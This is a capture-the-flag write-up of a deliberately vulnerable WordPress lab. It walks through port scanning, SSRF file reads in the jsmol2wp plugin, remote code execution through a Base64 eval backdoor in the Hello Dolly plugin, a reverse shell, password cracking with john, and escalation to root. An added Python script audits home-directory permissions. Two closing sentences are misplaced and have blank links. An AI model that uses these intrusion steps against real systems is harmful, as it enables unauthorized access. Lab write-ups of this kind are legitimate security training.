We begin with an Nmap scan and discover only two open ports: 22 (SSH) and 80 (HTTP).
┌──(kali㉿kali)-[~]
└─$ nmap -p- smol.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 11:34 IST
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.44% done
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.19% done; ETC: 11:53 (0:19:27 remaining)
Stats: 0:03:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 22.90% done; ETC: 11:47 (0:10:43 remaining)
Warning: 10.10.167.60 giving up on port because retransmission cap hit (6).
Nmap scan report for smol.thm (10.10.167.60)
Host is up (0.15s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 834.82 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -sT -p 22,80 smol.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 11:59 IST
Nmap scan report for smol.thm (10.10.167.60)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://www.smol.thm/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.67 seconds
We have an SSH server running on port 22 and a web server on port 80.
The page appears minimalistic, featuring only static links. However, as we later discover, it provides all the necessary information to achieve Remote Code Execution (RCE). The topics covered include XSS, SSRF, and RCE.
We attempted to discover additional virtual hosts using ffuf, but none were found.
The Feroxbuster directory scan reveals that the site runs WordPress, as indicated by directories like /wp-content/. Additionally, we discover the jsmol2wp plugin, which appears to be the room's namesake.
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://www.smol.thm --api-token [Your Token]
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://www.smol.thm/ [10.10.167.60]
[+] Started: Mon Feb 24 12:25:16 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://www.smol.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://www.smol.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://www.smol.thm/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://www.smol.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
Fingerprinting the version - Time: 00:00:22 <===========================================================================================================================================================> (702 / 702) 100.00% Time: 00:00:22
[i] The WordPress version could not be detected.
[+] WordPress theme in use: twentytwentythree
| Location: http://www.smol.thm/wp-content/themes/twentytwentythree/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://www.smol.thm/wp-content/themes/twentytwentythree/readme.txt
| [!] The version is out of date, the latest version is 1.6
| [!] Directory listing is enabled
| Style URL: http://www.smol.thm/wp-content/themes/twentytwentythree/style.css
| Style Name: Twenty Twenty-Three
| Style URI: https://wordpress.org/themes/twentytwentythree
| Description: Twenty Twenty-Three is designed to take advantage of the new design tools introduced in WordPress 6....
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://www.smol.thm/wp-content/themes/twentytwentythree/style.css, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] jsmol2wp
| Location: http://www.smol.thm/wp-content/plugins/jsmol2wp/
| Latest Version: 1.07 (up to date)
| Last Updated: 2018-03-09T10:28:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)
| References:
| - https://wpscan.com/vulnerability/0bbf1542-6e00-4a68-97f6-48a7790d1c3e
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20462
| - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS
|
| [!] Title: JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)
| References:
| - https://wpscan.com/vulnerability/ad01dad9-12ff-404f-8718-9ebbd67bf611
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20463
| - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS
|
| Version: 1.07 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://www.smol.thm/wp-content/plugins/jsmol2wp/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://www.smol.thm/wp-content/plugins/jsmol2wp/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:04 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:04
[i] No Config Backups Found.
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 23
[+] Finished: Mon Feb 24 12:27:27 2025
[+] Requests Done: 1457
[+] Cached Requests: 7
[+] Data Sent: 389.604 KB
[+] Data Received: 43.066 MB
[+] Memory used: 256.41 MB
[+] Elapsed time: 00:02:10
WPScan identifies two vulnerabilities in jsmol2wp: an unauthenticated XSS and an unauthenticated SSRF, the latter usable to read files from the server. The WPScan report links to PoC payloads that need only minor adjustments to the host.
Here we are also dealing with Dolly, a plugin present on the site; its source code is worth inspecting for potential vulnerabilities or backdoors.
We can examine the original Dolly plugin, which includes a hello.php file. We should search for this file to analyze its contents and identify any potential vulnerabilities or modifications.
We use the SSRF vulnerability again and read the hello.php file.
The PHP eval call stands out immediately, indicating a potential security risk. Its argument is Base64-encoded, likely as an attempt at security through obscurity, which is ineffective. We can decode the Base64 string to analyse what it actually does.
We decode it with CyberChef and find that part of the result is encoded again.
Decoding \143\x6d\144 gives us 'cmd'.
By calling hello_dolly(), we might be able to pass a cmd parameter and achieve remote code execution (RCE). To test this, we prepare a reverse shell using busybox, then encode the payload in Base64 to bypass potential input filtering.
www-data
After some trial and error, we successfully execute commands via index.php?cmd. We pass our Base64-encoded reverse shell, ensuring our listener is set up beforehand. We get a shell back as www-data, but there's no flag in sight yet.
Since we have the database user credentials, we check the database for any useful information.
We extract the hashes and attempt to crack them using hashcat or John the Ripper.
diego
With the cracked password, we switch to the user Diego using su and locate the first flag in Diego's home directory.
Privilege Escalation
think
Checking the home directory permissions, we see that the "internal" group has read access. Since Diego is part of this group, we can read files within other users' home directories.
This allows us to read Think's SSH key, which we can use to switch to their user account.
We copy the key to our machine, adjust the permissions, and use it to log in as Think via SSH.
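The lateral move above works only because a home directory and the private key inside it are readable by a group the attacker belongs to. As an added defender-side check (not part of the write-up), the following Python audits a /home-style tree for exactly that condition; it runs against a constructed temporary tree rather than the real /home.

```python
import os
import stat
import tempfile

# Constructed demo tree standing in for /home (not the room's real filesystem):
# "alice" is locked down; "bob" mirrors the write-up's finding, a home directory
# and .ssh readable by the group, with the private key readable as well.
def build_demo_tree() -> str:
    root = tempfile.mkdtemp(prefix="home-audit-")
    for user, home_mode, ssh_mode, key_mode in (("alice", 0o700, 0o700, 0o600),
                                                ("bob", 0o750, 0o750, 0o640)):
        ssh = os.path.join(root, user, ".ssh")
        os.makedirs(ssh)
        for name, text in (("id_rsa", "constructed placeholder, not a real key\n"),
                           ("id_rsa.pub", "constructed placeholder public key\n")):
            with open(os.path.join(ssh, name), "w") as fh:
                fh.write(text)
        os.chmod(os.path.join(ssh, "id_rsa"), key_mode)
        os.chmod(os.path.join(ssh, "id_rsa.pub"), 0o644)
        os.chmod(ssh, ssh_mode)
        os.chmod(os.path.join(root, user), home_mode)
    return root

PUBLIC_SSH_FILES = {"authorized_keys", "known_hosts", "config"}

def audit_home(root: str) -> list:
    """List home dirs open to group/others and SSH private keys readable beyond the owner."""
    findings = []
    for user in sorted(os.listdir(root)):
        home = os.path.join(root, user)
        if not os.path.isdir(home):
            continue
        mode = stat.S_IMODE(os.stat(home).st_mode)
        if mode & 0o077:
            findings.append(f"{user}: home directory mode {mode:o} grants group/other access")
        ssh = os.path.join(home, ".ssh")
        if not os.path.isdir(ssh):
            continue
        for name in sorted(os.listdir(ssh)):
            if name.endswith(".pub") or name in PUBLIC_SSH_FILES:
                continue  # public artefacts; everything else is treated as a private key
            fmode = stat.S_IMODE(os.stat(os.path.join(ssh, name)).st_mode)
            if fmode & 0o077:
                findings.append(f"{user}: private key .ssh/{name} mode {fmode:o} readable beyond owner")
    return findings

if __name__ == "__main__":
    for line in audit_home(build_demo_tree()):
        print(line)
```

Running audit_home("/home") on a live host requires root to stat every directory; the check is on mode bits, so it reports exposure even where the auditing account could not read the files itself.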
gege
Since only Gege has read permissions for the zip file, we need to find a way to access its contents. This old WordPress instance might contain useful credentials or configuration files that could help us move laterally.
Since we can switch to Gege using su, we now have access to the zip file in their home directory. This unintended privilege escalation is possible because of a misconfiguration in /etc/pam.d/su.
xavi
Now that we have access as Gege, we can retrieve the wordpress.old.zip file. This archived instance of WordPress might contain old credentials, configuration files, or other sensitive data that could help us escalate further.
The archive is password-protected.
We use zip2john to generate a hash.
zip2john wordpress.old.zip > hash.txt
We can now crack it using john with rockyou.txt.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
The old wp-config.php file contains database credentials for the user xavi, who also exists on the system. We can try switching to this user using su.
We can switch to the xavi user using su. Now, we can explore their home directory and check for further privilege escalation opportunities.
root
Since xavi has unrestricted sudo privileges, we can escalate to root by simply running:
sudo su
Now, we have full control over the system. We navigate to /root and retrieve the final flag.
Upon accessing the site, we are redirected to . To proceed, we need to add this domain to our /etc/hosts file.
We proceed with a WPScan, using an API key to generate a detailed report, including CVEs for detected vulnerabilities. A free API key can be obtained from .